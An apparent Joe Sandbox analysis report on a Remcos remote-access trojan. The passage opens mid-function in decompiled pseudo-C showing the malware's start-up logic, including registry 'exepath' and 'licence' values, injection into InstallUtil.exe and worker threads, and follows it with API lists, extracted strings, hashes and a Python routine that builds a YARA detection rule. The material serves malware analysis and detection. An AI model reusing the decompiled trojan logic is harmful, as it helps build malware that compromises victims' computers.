                                                                      							 *0x46daf4 = __eflags != 0;
                                                                      							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 8))));
                                                                      							 *0x46daf5 = __eflags != 0;
                                                                      							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 3))));
                                                                      							if(__eflags != 0) {
                                                                      								__eflags = E00438416(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x30)));
                                                                      								if(__eflags != 0) {
                                                                      									_t241 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 9));
                                                                      									_t480 = _t241;
                                                                      									_t243 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x30));
                                                                      									_t459 =  *_t241;
                                                                      									E00401ED3(0x46e5b8,  *_t241, _t241, E0041905E( &_v780,  *_t241, _t243));
                                                                      									E00401EC9();
                                                                      								}
                                                                      							}
                                                                      							__eflags = _v776;
                                                                      							if(_v776 != 0) {
                                                                      								E004337A0(_t468,  &_v524, 0, 0x208);
                                                                      								_t116 = E0040243C();
                                                                      								_t117 = E00401F6B(0x46e5e8);
                                                                      								_t460 = E00401F6B(0x46e5a0);
                                                                      								E00410C6B(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
                                                                      								_t505 = _t503 + 0x20;
                                                                      								L00409F8A(_t274, 0x46e588, _t119,  &_v524);
                                                                      								_t471 = 0x46e600;
                                                                      								goto L42;
                                                                      							} else {
                                                                      								__eflags =  *0x46daf6;
                                                                      								if(__eflags == 0) {
                                                                      									L00409F8A(_t274, 0x46e588, _t459, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
                                                                      								} else {
                                                                      									_t227 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x1e));
                                                                      									_t229 = E00401F6B(E00401E25(0x46e600, _t459, _t494, __eflags, 0xc));
                                                                      									_t417 = E00401E25(0x46e600, _t459, _t494, __eflags, 9);
                                                                      									_t231 = E00401F6B(_t417);
                                                                      									__eflags =  *_t227;
                                                                      									__eflags =  *_t229;
                                                                      									_t480 = 0x46e600;
                                                                      									_push((_t417 & 0xffffff00 |  *_t227 != 0x00000000) & 0x000000ff);
                                                                      									_t233 = E00401F6B(E00401E25(0x46e600, _t459, _t494,  *_t229, 0xa));
                                                                      									E0040AAE9( *_t231, E00401F6B(E00401E25(0x46e600, _t459, _t494, __eflags, 0x30)), __eflags, _t233, ((_t417 & 0xffffff00 |  *_t227 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff);
                                                                      									_t503 = _t503 + 0xc;
                                                                      									_t274 = 1;
                                                                      								}
                                                                      								_t207 = E0040243C();
                                                                      								_t463 = 2;
                                                                      								_t400 =  ~(0 | __eflags > 0x00000000) | (_t207 + 0x00000001) * _t463;
                                                                      								_push(_t400);
                                                                      								_v780 = _t400;
                                                                      								_t489 = E004310E6(_t400, (_t207 + 1) * _t463 >> 0x20, _t480, __eflags);
                                                                      								__eflags = _t489;
                                                                      								if(_t489 == 0) {
                                                                      									_t489 = 0;
                                                                      									__eflags = 0;
                                                                      								} else {
                                                                      									E004337A0(0x46e588, _t489, 0, _v780);
                                                                      									_t503 = _t503 + 0xc;
                                                                      								}
                                                                      								E00439346(_t489, E00401EC4(0x46e588));
                                                                      								_t213 = E0040243C();
                                                                      								_t214 = E00401F6B(0x46e5e8);
                                                                      								_t215 = E0040243C();
                                                                      								E00410EBB(E00401F6B(0x46e5a0), __eflags, "exepath", _t489, 2 + _t215 * 2, _t214, _t213); // executed
                                                                      								E004310EF(_t489);
                                                                      								_t505 = _t503 + 0x1c;
                                                                      								_t471 = 0x46e600;
                                                                      								E00401E25(0x46e600, _t217, _t494, __eflags, 0xd);
                                                                      								_t460 = "0";
                                                                      								__eflags = E0040ECD0(__eflags);
                                                                      								if(__eflags == 0) {
                                                                      									L42:
                                                                      									_push(_t274);
                                                                      									_t124 = E00401F6B(E00401E25(_t471, _t460, _t494, __eflags, 0x34));
                                                                      									_t506 = _t505 - 0x18;
                                                                      									E00402053(_t274, _t506, _t460, _t494, _t124);
                                                                      									_push("licence");
                                                                      									_t461 = E00401F6B(0x46e5a0); // executed
                                                                      									E00410CE2(0x46e5a0, _t126); // executed
                                                                      									_t507 = _t506 + 0x20;
                                                                      									_t130 = E004383EC(_t128, E00401F6B(E00401E25(_t471, _t126, _t494, __eflags, 0x28)));
                                                                      									 *0x46dd00 = _t130;
                                                                      									__eflags = _t130 - 2;
                                                                      									if(_t130 != 2) {
                                                                      										__eflags = _t130 - _t274;
                                                                      										if(_t130 == _t274) {
                                                                      											_t394 = 0;
                                                                      											__eflags = 0;
                                                                      											goto L46;
                                                                      										}
                                                                      									} else {
                                                                      										_t394 = _t274;
                                                                      										L46:
                                                                      										E00419F77(_t274, _t394, _t461, _t471);
                                                                      										__eflags = 0;
                                                                      										CreateThread(0, 0, E00419D46, 0, 0, 0);
                                                                      									}
                                                                      									_t508 = _t507 - 0x18;
                                                                      									E00402053(_t274, _t508, _t461, _t494, "Remcos Agent initialized");
                                                                      									_t509 = _t508 - 0x18;
                                                                      									E00402053(_t274, _t509, _t461, _t494, "i");
                                                                      									E00417D02(_t274, _t471);
                                                                      									_t501 = _t509 + 0x30;
                                                                      									_t135 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0x37));
                                                                      									_t137 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0x10));
                                                                      									_t139 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0xf));
                                                                      									__eflags =  *_t135;
                                                                      									_t477 = 0x46e600;
                                                                      									_t142 = E004383EC(_t140, E00401F6B(E00401E25(0x46e600, _t461, _t494,  *_t135, 0x36)));
                                                                      									_t144 = E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x11));
                                                                      									E00408651(_t137, _t139, __eflags,  *_t139 & 0x000000ff,  *_t137 & 0x000000ff, E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x31)), _t144, _t142, (_t138 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
                                                                      									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x14)))) - 1;
                                                                      									if(__eflags != 0) {
                                                                      										_t468 = CreateThread;
                                                                      									} else {
                                                                      										_t197 = 2;
                                                                      										_t488 = E00430E1B(_t461, 0x46e600, __eflags, _t197);
                                                                      										 *_t488 = 0;
                                                                      										_t392 = E00401E25(0x46e600, _t461, _t494, __eflags, 0x35);
                                                                      										_t200 = E00401F6B(_t392);
                                                                      										_t468 = __imp__CreateThread; // 0x76ec43e0
                                                                      										__eflags =  *_t200;
                                                                      										 *((char*)(_t488 + 1)) = _t392 & 0xffffff00 | __eflags != 0x00000000;
                                                                      										CreateThread(0, 0, E00416832, _t488, 0, 0);
                                                                      										_t477 = 0x46e600;
                                                                      									}
                                                                      									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x16)))) - 1;
                                                                      									if(__eflags == 0) {
                                                                      										_t191 = 2;
                                                                      										_t487 = E00430E1B(_t461, _t477, __eflags, _t191);
                                                                      										 *_t487 = 1;
                                                                      										_t388 = E00401E25(0x46e600, _t461, _t494, __eflags, 0x35);
                                                                      										_t194 = E00401F6B(_t388);
                                                                      										__eflags =  *_t194;
                                                                      										__eflags = 0;
                                                                      										 *((char*)(_t487 + 1)) = _t388 & 0xffffff00 |  *_t194 != 0x00000000;
                                                                      										CreateThread(0, 0, E00416832, _t487, 0, 0);
                                                                      										_t477 = 0x46e600;
                                                                      									}
                                                                      									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x23)))) - 1;
                                                                      									if(__eflags == 0) {
                                                                      										 *0x46da75 = 1;
                                                                      										_t183 = E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x25));
                                                                      										_t185 = E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x26));
                                                                      										_t461 =  *_t183;
                                                                      										E00401ED3(0x46e0d8,  *_t183, _t183, E00419012( &_v780,  *_t183, _t185));
                                                                      										E00401EC9();
                                                                      										__eflags = 0;
                                                                      										CreateThread(0, 0, E00401BA9, 0, 0, 0);
                                                                      										_t477 = 0x46e600;
                                                                      									}
                                                                      									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x2b)))) - 1;
                                                                      									if(__eflags == 0) {
                                                                      										_t477 = E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x2c));
                                                                      										_t180 = E004383EC(_t178, E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x2d)));
                                                                      										__eflags =  *_t477;
                                                                      										_t461 = _t180;
                                                                      										__eflags =  *_t477 != 0;
                                                                      										E0040A7ED(_t180);
                                                                      									}
                                                                      									_t158 = E00417E20( &_v772, _t461, _t468, __eflags); // executed
                                                                      									E00401ED3(0x46e60c, _t461, _t477, _t158);
                                                                      									_t366 =  &_v776;
                                                                      									E00401EC9();
                                                                      									_t161 =  *0x46dd0c; // 0x76ec3a30
                                                                      									_t272 = 0;
                                                                      									__eflags = _t161;
                                                                      									if(_t161 != 0) {
                                                                      										 *_t161(0); // executed
                                                                      									}
                                                                      									CreateThread(_t272, _t272, E0040D26E, _t272, _t272, _t272); // executed
                                                                      									__eflags =  *0x46dd03;
                                                                      									if( *0x46dd03 != 0) {
                                                                      										CreateThread(_t272, _t272, E0040FC77, _t272, _t272, _t272);
                                                                      									}
                                                                      									__eflags =  *0x46dd58;
                                                                      									if( *0x46dd58 != 0) {
                                                                      										CreateThread(_t272, _t272, E00410195, _t272, _t272, _t272);
                                                                      									}
                                                                      									_t163 =  *0x46c9c0; // 0x1
                                                                      									_t164 = _t163 - _t272;
                                                                      									__eflags = _t164;
                                                                      									if(__eflags == 0) {
                                                                      										goto L66;
                                                                      									} else {
                                                                      										__eflags = _t164 - 1;
                                                                      										if(__eflags == 0) {
                                                                      											_push("Administrator");
                                                                      											goto L67;
                                                                      										}
                                                                      									}
                                                                      									goto L68;
                                                                      								} else {
                                                                      									_t222 = E00401E25(0x46e600, "0", _t494, __eflags, 0xd);
                                                                      									_t513 = _t505 - 0x18;
                                                                      									_t460 = _t222;
                                                                      									E00418385(_t513, _t222);
                                                                      									_t224 = E0040CF95(__eflags);
                                                                      									_t505 = _t513 + 0x18;
                                                                      									__eflags = _t224 - _t274;
                                                                      									if(__eflags != 0) {
                                                                      										goto L42;
                                                                      									} else {
                                                                      										_t274 = 3;
                                                                      										goto L40;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_v780 = 0;
                                                                      						_t457 = E00401F6B(0x46e5a0);
                                                                      						__eflags = E00410AC0(_t267, "WD",  &_v780);
                                                                      						if(__eflags != 0) {
                                                                      							_t461 = E00401F6B(0x46e5a0);
                                                                      							E00410F1D(_t269, __eflags, "WD");
                                                                      							E0040FF45();
                                                                      							L66:
                                                                      							_push("User");
                                                                      							L67:
                                                                      							E004052D4(_t272, _t501 - 0x18, "Access Level: ", _t494, __eflags, E00402053(_t272,  &_v776, _t461, _t494));
                                                                      							E00402053(_t272, _t501 - 4, "Access Level: ", _t494, "i");
                                                                      							E00417D02(_t272, _t468);
                                                                      							_t366 =  &_v784;
                                                                      							E00401F98(); // executed
                                                                      							L68:
                                                                      							E00412503(); // executed
                                                                      							asm("int3");
                                                                      							_push(_t477);
                                                                      							_t484 = _t366 + 0x68;
                                                                      							E0040D6FF(_t272, _t484, _t484);
                                                                      							_t289 = _t484;
                                                                      							 *_t289 = 0x462178;
                                                                      							 *_t289 = 0x462134;
                                                                      							return E004320A9(_t289);
                                                                      						} else {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_push(__ecx);
                                                                      					_push(__ecx);
                                                                      					__ecx =  &_v700;
                                                                      					__eax = E0040D72E( &_v700, __edx, __eflags, "license_code.txt", 2);
                                                                      					__ecx = 0x46e600;
                                                                      					__ecx = E00401E25(0x46e600, __edx, __ebp, __eflags, 0x34);
                                                                      					__edx = __eax;
                                                                      					__ecx =  &_v720;
                                                                      					__eax = E0040EAB2( &_v720, __edx, __eflags);
                                                                      					__ecx =  &_v720;
                                                                      					__eax = E0040D6DF( &_v720, __edx, __eflags);
                                                                      					__ecx =  &_v720;
                                                                      					L69();
                                                                      					__ecx =  &_v744;
                                                                      					E00401F98() = 0;
                                                                      					__eax = 1;
                                                                      					__eflags = 1;
                                                                      					L3:
                                                                      					return _t92;
                                                                      				}
                                                                      			}
                                                                      0x0040c8f3
                                                                      0x0040c8f6
                                                                      0x0040c8f8
                                                                      0x0040c90b
                                                                      0x0040c90b
                                                                      0x0040c8fa
                                                                      0x0040c901
                                                                      0x0040c906
                                                                      0x0040c906
                                                                      0x0040c916
                                                                      0x0040c923
                                                                      0x0040c92b
                                                                      0x0040c936
                                                                      0x0040c955
                                                                      0x0040c95b
                                                                      0x0040c960
                                                                      0x0040c963
                                                                      0x0040c96c
                                                                      0x0040c971
                                                                      0x0040c97d
                                                                      0x0040c97f
                                                                      0x0040ca1f
                                                                      0x0040ca1f
                                                                      0x0040ca2b
                                                                      0x0040ca30
                                                                      0x0040ca36
                                                                      0x0040ca3b
                                                                      0x0040ca4a
                                                                      0x0040ca4c
                                                                      0x0040ca51
                                                                      0x0040ca65
                                                                      0x0040ca70
                                                                      0x0040ca76
                                                                      0x0040ca78
                                                                      0x0040ca7e
                                                                      0x0040ca80
                                                                      0x0040ca82
                                                                      0x0040ca82
                                                                      0x00000000
                                                                      0x0040ca82
                                                                      0x0040ca7a
                                                                      0x0040ca7a
                                                                      0x0040ca84
                                                                      0x0040ca84
                                                                      0x0040ca89
                                                                      0x0040ca95
                                                                      0x0040ca95
                                                                      0x0040ca97
                                                                      0x0040caa1
                                                                      0x0040caa6
                                                                      0x0040cab0
                                                                      0x0040cab5
                                                                      0x0040caba
                                                                      0x0040cac8
                                                                      0x0040cada
                                                                      0x0040caec
                                                                      0x0040caf1
                                                                      0x0040caf6
                                                                      0x0040cb13
                                                                      0x0040cb25
                                                                      0x0040cb44
                                                                      0x0040cb5c
                                                                      0x0040cb5e
                                                                      0x0040cba6
                                                                      0x0040cb60
                                                                      0x0040cb62
                                                                      0x0040cb69
                                                                      0x0040cb73
                                                                      0x0040cb7b
                                                                      0x0040cb7d
                                                                      0x0040cb82
                                                                      0x0040cb88
                                                                      0x0040cb9a
                                                                      0x0040cb9d
                                                                      0x0040cb9f
                                                                      0x0040cb9f
                                                                      0x0040cbbc
                                                                      0x0040cbbe
                                                                      0x0040cbc2
                                                                      0x0040cbc9
                                                                      0x0040cbd3
                                                                      0x0040cbda
                                                                      0x0040cbdc
                                                                      0x0040cbe1
                                                                      0x0040cbe7
                                                                      0x0040cbf3
                                                                      0x0040cbf6
                                                                      0x0040cbf8
                                                                      0x0040cbf8
                                                                      0x0040cc0d
                                                                      0x0040cc0f
                                                                      0x0040cc15
                                                                      0x0040cc22
                                                                      0x0040cc37
                                                                      0x0040cc3c
                                                                      0x0040cc4f
                                                                      0x0040cc58
                                                                      0x0040cc5d
                                                                      0x0040cc69
                                                                      0x0040cc6b
                                                                      0x0040cc6b
                                                                      0x0040cc80
                                                                      0x0040cc82
                                                                      0x0040cc9b
                                                                      0x0040ccaa
                                                                      0x0040ccaf
                                                                      0x0040ccb2
                                                                      0x0040ccb5
                                                                      0x0040ccb8
                                                                      0x0040ccb8
                                                                      0x0040ccc1
                                                                      0x0040cccc
                                                                      0x0040ccd1
                                                                      0x0040ccd5
                                                                      0x0040ccda
                                                                      0x0040ccdf
                                                                      0x0040cce1
                                                                      0x0040cce3
                                                                      0x0040cce6
                                                                      0x0040cce6
                                                                      0x0040ccf2
                                                                      0x0040ccf4
                                                                      0x0040ccfb
                                                                      0x0040cd07
                                                                      0x0040cd07
                                                                      0x0040cd09
                                                                      0x0040cd10
                                                                      0x0040cd1c
                                                                      0x0040cd1c
                                                                      0x0040cd1e
                                                                      0x0040cd23
                                                                      0x0040cd23
                                                                      0x0040cd25
                                                                      0x00000000
                                                                      0x0040cd27
                                                                      0x0040cd27
                                                                      0x0040cd2a
                                                                      0x0040cd2c
                                                                      0x00000000
                                                                      0x0040cd2c
                                                                      0x0040cd2a
                                                                      0x00000000
                                                                      0x0040c985
                                                                      0x0040c989
                                                                      0x0040c98e
                                                                      0x0040c991
                                                                      0x0040c995
                                                                      0x0040c99a
                                                                      0x0040c99f
                                                                      0x0040c9a2
                                                                      0x0040c9a4
                                                                      0x00000000
                                                                      0x0040c9a6
                                                                      0x0040c9a8
                                                                      0x00000000
                                                                      0x0040c9a8
                                                                      0x0040c9a4
                                                                      0x0040c97f
                                                                      0x0040c826
                                                                      0x0040c563
                                                                      0x0040c567
                                                                      0x0040c578
                                                                      0x0040c581
                                                                      0x0040c583
                                                                      0x0040cd3f
                                                                      0x0040cd41
                                                                      0x0040cd4b
                                                                      0x0040cd50
                                                                      0x0040cd50
                                                                      0x0040cd55
                                                                      0x0040cd69
                                                                      0x0040cd78
                                                                      0x0040cd7d
                                                                      0x0040cd85
                                                                      0x0040cd89
                                                                      0x0040cd8e
                                                                      0x0040cd8e
                                                                      0x0040cd93
                                                                      0x0040cd94
                                                                      0x0040cd95
                                                                      0x0040cd9a
                                                                      0x0040cd9f
                                                                      0x0040e252
                                                                      0x0040c2b0
                                                                      0x0040c2bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040c583
                                                                      0x0040c457
                                                                      0x0040c457
                                                                      0x0040c458
                                                                      0x0040c460
                                                                      0x0040c464
                                                                      0x0040c46b
                                                                      0x0040c475
                                                                      0x0040c47c
                                                                      0x0040c47e
                                                                      0x0040c482
                                                                      0x0040c487
                                                                      0x0040c48b
                                                                      0x0040c490
                                                                      0x0040c494
                                                                      0x0040c499
                                                                      0x0040c4a2
                                                                      0x0040c4a4
                                                                      0x0040c4a4
                                                                      0x0040c4a5
                                                                      0x0040c4ab
                                                                      0x0040c4ab

                                                                      APIs
                                                                      • OpenMutexA.KERNEL32 ref: 0040C5BD
                                                                      • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C5CF
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C5D6
                                                                        • Part of subcall function 0040EAB2: __EH_prolog.LIBCMT ref: 0040EAB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseH_prologHandleMutexObjectOpenSingleWait
                                                                      • String ID: (32 bit)$ (64 bit)$0:v@O-t$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos Agent initialized$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$exepath$licence$license_code.txt$origmsc$Cv
                                                                      • API String ID: 46554527-3425213474
                                                                      • Opcode ID: 33a8a3d6da3b889eb178367c5ea9bf29c9078ddf528fc83aed4e7b77ade77523
                                                                      • Instruction ID: 56d1e19bc8dcb5b9211f51e228283d429f534a44c8a0b5fcf6a0cae10bb52002
                                                                      • Opcode Fuzzy Hash: 33a8a3d6da3b889eb178367c5ea9bf29c9078ddf528fc83aed4e7b77ade77523
                                                                      • Instruction Fuzzy Hash: D8329260B043416BDA1577729CA7B7E26994F85748F14083FF542BB2E2EEBC8C45839E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
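The three API lines and the String ID value above are the raw material an analyst turns into a hunt. As an added example (not Joe Sandbox's code and not code from the sample), the following Python parses those two listings in exactly the notation this report uses, decodes the WaitForSingleObject timeout argument (0xEA60 = 60000 ms, i.e. 60 s), recognises the OpenMutexA / WaitForSingleObject / CloseHandle sequence, and emits a YARA rule from the distinctive strings. The API lines and the String ID value are copied from this page; the length threshold used to pick strings, the rule name and the `3 of` condition are this example's own assumptions, and the resulting rule needs false-positive testing against clean binaries before use (the registry key and the InstallUtil.exe path also occur in benign software).

```python
"""
Parser for the "APIs" and "String ID" listings of a Joe Sandbox function
summary, plus a YARA rule generator fed from them.

Added example for this page; not Joe Sandbox or Remcos code. The API lines
and STRING_ID are copied from the report; MIN_LEN, the rule name and the
"3 of" threshold are assumptions of this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Copied from the "APIs" section (the bullet is part of the format).
API_LINES = [
    "• OpenMutexA.KERNEL32 ref: 0040C5BD",
    "• WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C5CF",
    "• CloseHandle.KERNEL32(00000000), ref: 0040C5D6",
    "  • Part of subcall function 0040EAB2: __EH_prolog.LIBCMT ref: 0040EAB7",
]

# Copied from the "String ID" value; Joe Sandbox joins the strings with '$'.
STRING_ID = (
    "(32 bit)$ (64 bit)$0:v@O-t$Access Level: $Administrator$"
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe$"
    "Exe$Exe$Inj$ProductName$Remcos$Remcos Agent initialized$"
    "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion$Software\\$User$"
    "exepath$licence$license_code.txt$origmsc$Cv"
)

INFINITE = 0xFFFFFFFF   # dwMilliseconds value meaning "wait forever"
MIN_LEN = 14            # assumption: crude distinctiveness filter for YARA strings


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                    # hex arguments exactly as printed
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines


_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)


def parse_api_line(line: str) -> ApiCall:
    """Parse one bullet of the APIs listing; raises ValueError on anything else."""
    m = _API_RE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    sub, name, module, args, ref = m.groups()
    return ApiCall(name, module,
                   [a.strip() for a in args.split(",")] if args else [],
                   int(ref, 16), int(sub, 16) if sub else None)


def parse_api_lines(lines: List[str]) -> List[ApiCall]:
    return [parse_api_line(line) for line in lines]


def wait_timeout_ms(call: ApiCall) -> Optional[int]:
    """dwMilliseconds of WaitForSingleObject(hHandle, dwMilliseconds), else None."""
    if call.name != "WaitForSingleObject" or len(call.args) < 2:
        return None
    return int(call.args[1], 16)


def describe_mutex_wait(calls: List[ApiCall]) -> Optional[str]:
    """Recognise OpenMutexA -> WaitForSingleObject -> CloseHandle in the top-level calls."""
    top = [c for c in calls if c.subcall_of is None]
    names = [c.name for c in top]
    if "OpenMutexA" not in names:
        return None
    i = names.index("OpenMutexA")
    if names[i + 1:i + 3] != ["WaitForSingleObject", "CloseHandle"]:
        return None
    ms = wait_timeout_ms(top[i + 1])
    how_long = "forever" if ms == INFINITE else f"up to {ms / 1000:g} s"
    return f"opens an existing mutex and waits {how_long} to acquire it before closing the handle"


def split_string_id(string_id: str) -> List[str]:
    """Individual strings of a '$'-joined String ID, in report order."""
    return string_id.split("$")


def select_yara_strings(strings: List[str], min_len: int = MIN_LEN) -> List[str]:
    """Keep long, de-duplicated strings in first-seen order (review by hand)."""
    out: List[str] = []
    for s in strings:
        if len(s) >= min_len and s not in out:
            out.append(s)
    return out


def yara_escape(s: str) -> str:
    """Escape a text string for a double-quoted YARA literal."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_yara_rule(name: str, strings: List[str], min_match: int = 3,
                    modifiers: str = "ascii wide") -> str:
    if min_match > len(strings):
        raise ValueError("threshold exceeds number of strings")
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        lines.append(f'        $s{i} = "{yara_escape(s)}" {modifiers}')
    lines += ["    condition:", f"        {min_match} of ($s*)", "}"]
    return "\n".join(lines) + "\n"


def rule_from_report() -> str:
    """End to end: report listings in, YARA rule text out."""
    return build_yara_rule("remcos_installutil_dump_strings",
                           select_yara_strings(split_string_id(STRING_ID)))


if __name__ == "__main__":
    print(describe_mutex_wait(parse_api_lines(API_LINES)))
    print(rule_from_report())
```

With MIN_LEN at 14 the selector keeps five strings (the access-level prefix, the InstallUtil.exe path, "Remcos Agent initialized", the CurrentVersion key and license_code.txt) and drops short or generic ones such as "Administrator" and "Exe"; the `ascii wide` modifiers cost little and cover a Unicode copy of the same strings if one exists in another dump. Since the scan target is a memory dump that may lack a PE header, the rule deliberately has no MZ check.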

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph of E00412503 (blocks 412503-412ff3) not rendered; only the node list was extracted. Recoverable from it: a Sleep call at 41254d-412554 near the entry; a path through 412765-412770 that calls WSAGetLastError; a GetTickCount call inside the large block 412976-412f2c; and a back-edge from 412fc5-412fe5 (Sleep) through 412feb-412ff3 to 41261a-4126b5, so the function loops back after sleeping.]
                                                                      C-Code - Quality: 89%
                                                                      			E00412503() {
                                                                      				char _v16;
                                                                      				char _v40;
                                                                      				char _v64;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v112;
                                                                      				void* _v135;
                                                                      				char _v136;
                                                                      				char _v160;
                                                                      				char _v184;
                                                                      				char _v208;
                                                                      				char _v232;
                                                                      				char _v256;
                                                                      				char _v280;
                                                                      				char _v304;
                                                                      				char _v328;
                                                                      				char _v352;
                                                                      				char _v376;
                                                                      				char _v400;
                                                                      				char _v424;
                                                                      				char _v448;
                                                                      				char _v472;
                                                                      				char _v496;
                                                                      				char _v520;
                                                                      				char _v544;
                                                                      				char _v568;
                                                                      				char _v592;
                                                                      				char _v616;
                                                                      				char _v640;
                                                                      				char _v664;
                                                                      				char _v688;
                                                                      				char _v712;
                                                                      				char _v736;
                                                                      				char _v760;
                                                                      				char _v784;
                                                                      				char _v808;
                                                                      				char _v832;
                                                                      				char _v856;
                                                                      				char _v880;
                                                                      				char _v904;
                                                                      				char _v928;
                                                                      				char _v952;
                                                                      				char _v976;
                                                                      				char _v1000;
                                                                      				char _v1024;
                                                                      				char _v1048;
                                                                      				char _v1072;
                                                                      				char _v1096;
                                                                      				char _v1120;
                                                                      				char _v1144;
                                                                      				char _v1168;
                                                                      				char _v1192;
                                                                      				char _v1216;
                                                                      				char _v1240;
                                                                      				char _v1264;
                                                                      				char _v1288;
                                                                      				char _v1312;
                                                                      				char _v1336;
                                                                      				char _v1360;
                                                                      				char _v1384;
                                                                      				char _v1408;
                                                                      				char _v1432;
                                                                      				char _v2436;
                                                                      				signed int _t164;
                                                                      				void* _t166;
                                                                      				long _t171;
                                                                      				void* _t173;
                                                                      				void* _t176;
                                                                      				void* _t184;
                                                                      				char* _t195;
                                                                      				void* _t197;
                                                                      				void* _t198;
                                                                      				struct _SECURITY_ATTRIBUTES* _t199;
                                                                      				struct _SECURITY_ATTRIBUTES* _t201;
                                                                      				void* _t203;
                                                                      				long _t208;
                                                                      				void* _t209;
                                                                      				void* _t210;
                                                                      				void* _t224;
                                                                      				void* _t232;
                                                                      				void* _t233;
                                                                      				struct _SECURITY_ATTRIBUTES* _t236;
                                                                      				intOrPtr* _t237;
                                                                      				void* _t240;
                                                                      				void* _t241;
                                                                      				void* _t242;
                                                                      				void* _t245;
                                                                      				void* _t247;
                                                                      				void* _t250;
                                                                      				void* _t251;
                                                                      				void* _t252;
                                                                      				void* _t253;
                                                                      				void* _t255;
                                                                      				void* _t256;
                                                                      				void* _t257;
                                                                      				intOrPtr* _t352;
                                                                      				void* _t367;
                                                                      				void* _t373;
                                                                      				void* _t375;
                                                                      				void* _t377;
                                                                      				void* _t379;
                                                                      				char* _t381;
                                                                      				void* _t383;
                                                                      				long _t385;
                                                                      				void* _t386;
                                                                      				struct _SECURITY_ATTRIBUTES* _t387;
                                                                      				char* _t415;
                                                                      				void* _t634;
                                                                      				void* _t646;
                                                                      				void* _t699;
                                                                      				signed short _t701;
                                                                      				void* _t709;
                                                                      				void* _t710;
                                                                      				void* _t711;
                                                                      				void* _t712;
                                                                      				void* _t713;
                                                                      				void* _t714;
                                                                      				void* _t715;
                                                                      				void* _t716;
                                                                      				void* _t717;
                                                                      				void* _t718;
                                                                      				void* _t719;
                                                                      				void* _t720;
                                                                      				void* _t724;
                                                                      				void* _t725;
                                                                      				void* _t726;
                                                                      				void* _t727;
                                                                      				void* _t728;
                                                                      				void* _t729;
                                                                      				void* _t730;
                                                                      				void* _t731;
                                                                      				void* _t732;
                                                                      				long _t734;
                                                                      
                                                                      				_push(_t386);
                                                                      				_push(_t703);
                                                                      				E0040209F(_t386,  &_v100);
                                                                      				E0041804F( &_v256, _t634);
                                                                      				E0040209F(_t386,  &_v1432);
                                                                      				_t699 = 0x46e600;
                                                                      				_t164 = E004383EC(_t162, E00401F6B(E00401E25(0x46e600, _t634, _t709, _t732, 0x29)));
                                                                      				if(_t164 != 0) {
                                                                      					_t385 = _t164 * 0x3e8;
                                                                      					_t734 = _t385;
                                                                      					Sleep(_t385);
                                                                      				}
                                                                      				_t711 = _t710 - 0x18;
                                                                      				E00402053(_t386, _t711, _t634, _t709, 0x467228);
                                                                      				_t166 = E00401E25(_t699, _t634, _t709, _t734, 0);
                                                                      				_t712 = _t711 - 0x18;
                                                                      				E004020B6(_t386, _t712, _t634, _t734, _t166);
                                                                      				E0041851D( &_v76, _t634);
                                                                      				_t713 = _t712 + 0x30;
                                                                      				_t387 = 0; // executed
                                                                      				E00404875(); // executed
                                                                      				E00401E25(_t699, _t634, _t709, _t734, 0x3a);
